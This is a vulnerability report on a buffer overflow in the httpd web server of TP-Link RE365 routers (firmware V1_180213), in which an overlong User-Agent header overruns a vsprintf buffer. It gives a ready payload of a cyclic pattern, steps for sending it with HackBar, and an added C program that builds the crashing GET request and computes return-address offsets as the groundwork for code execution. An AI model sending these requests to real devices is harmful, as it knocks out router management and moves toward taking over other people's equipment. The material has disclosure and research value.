Vendor of the products: TP-Link
Vendor's website: http://www.tp-link.com
Reported by: Chen Xiao(2235254941@qq.com)
Affected products: TP-Link RE365 Routers
Affected firmware version: V1_180213
Firmware download address: TP-Link RE365
In TP-Link RE365 routers running firmware V1_180213 there is a buffer overflow vulnerability in /usr/bin/httpd caused by the lack of length verification for the USER_AGENT field (the User-Agent request header). An attacker who successfully exploits this vulnerability can crash the remote target device (denial of service) or potentially execute arbitrary code by sending a GET request whose User-Agent header is filled with extremely long data.
In the httpRpmWmbParse function of the /usr/bin/httpd binary, the content of the USER_AGENT field is passed to the PRINTF_ECHO function. In PRINTF_ECHO, the USER_AGENT content is formatted into a string via vsprintf and stored in the local buffer v3 (the decompiler's name for that buffer).
There is no check on the length of the attacker-controllable USER_AGENT field, and vsprintf performs no bounds checking on its destination, so a sufficiently long value overruns v3. Writing a large amount of data into the USER_AGENT field therefore causes a denial of service (DoS) and may allow arbitrary code execution.
Send a GET request to the IP address of the backend management system with a large amount of data in the User-Agent request header, for example:
Mobile;aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj
Send the GET request using HackBar with the long User-Agent value; this triggers the buffer overflow.
After the attack a denial of service occurs: httpd has crashed and the backend management system can no longer be accessed.
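The User-Agent value above is a de Bruijn "cyclic" pattern (alphabet a..z, every 4-byte window unique, the same construction pwntools' cyclic() produces) prefixed with "Mobile;". Such a pattern is used so that, after the crash, the 4 bytes found in a register or in the saved return address can be mapped back to their offset in the header. The following is an added example, not part of the original report: a generator for that pattern, the matching offset lookup, and a builder for the PoC request. The host "192.168.0.1", the path "/" and the pattern length of 2000 are assumptions.

```c
/* Added example, not part of the original report. Generates the de Bruijn
 * cyclic pattern used as the User-Agent value in the PoC, maps a 4-byte
 * chunk back to its offset, and builds the GET request. Host, path and
 * pattern length are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ALPHA "abcdefghijklmnopqrstuvwxyz"
#define K 26   /* alphabet size */
#define N 4    /* window size: every 4-byte substring is unique */

struct gen {
    char  *out;       /* destination buffer */
    size_t cap;       /* bytes requested */
    size_t len;       /* bytes emitted so far */
    int    a[N + 1];  /* working array of the de Bruijn construction */
};

/* Standard recursive de Bruijn B(K,N) construction; stops emitting as
 * soon as cap bytes have been produced. */
static void db(struct gen *g, int t, int p)
{
    if (g->len >= g->cap)
        return;
    if (t > N) {
        if (N % p == 0)
            for (int i = 1; i <= p && g->len < g->cap; i++)
                g->out[g->len++] = ALPHA[g->a[i]];
    } else {
        g->a[t] = g->a[t - p];
        db(g, t + 1, p);
        for (int j = g->a[t - p] + 1; j < K; j++) {
            if (g->len >= g->cap)
                return;
            g->a[t] = j;
            db(g, t + 1, t);
        }
    }
}

/* Fill buf (capacity at least len + 1) with the first len bytes of the
 * pattern, NUL-terminated. The prefix is "aaaabaaacaaad..." as in the PoC. */
static void cyclic(char *buf, size_t len)
{
    struct gen g = { buf, len, 0, {0} };
    db(&g, 1, 1);
    buf[len] = '\0';
}

/* Offset of a NUL-terminated chunk (normally 4 bytes read from a register
 * or the stack after the crash) within the first max_len pattern bytes,
 * or -1 if it does not occur there. */
static long cyclic_find(const char *chunk, size_t max_len)
{
    char *buf = malloc(max_len + 1);
    if (buf == NULL)
        return -1;
    cyclic(buf, max_len);
    const char *hit = strstr(buf, chunk);
    long off = hit ? (long)(hit - buf) : -1;
    free(buf);
    return off;
}

/* Build the PoC request: GET / with "User-Agent: Mobile;<pattern>".
 * Returns the request length, or -1 if it does not fit in req. */
static int build_request(char *req, size_t req_len, const char *host, size_t pattern_len)
{
    char *pat = malloc(pattern_len + 1);
    if (pat == NULL)
        return -1;
    cyclic(pat, pattern_len);
    int n = snprintf(req, req_len,
                     "GET / HTTP/1.1\r\nHost: %s\r\nUser-Agent: Mobile;%s\r\n"
                     "Connection: close\r\n\r\n", host, pat);
    free(pat);
    return (n < 0 || (size_t)n >= req_len) ? -1 : n;
}

int main(void)
{
    char req[4096];
    int n = build_request(req, sizeof req, "192.168.0.1", 2000);  /* assumed host */
    if (n > 0)
        fwrite(req, 1, (size_t)n, stdout);
    /* After the crash, look up the 4 bytes that landed in the register. */
    printf("\noffset of \"aaad\": %ld\n", cyclic_find("aaad", 2000));
    return 0;
}
```

The request bytes written by main() are what HackBar or a raw TCP client sends; the report only demonstrates the resulting crash, and the offset lookup is the step a practitioner would use next to determine how far into the header the saved return address sits.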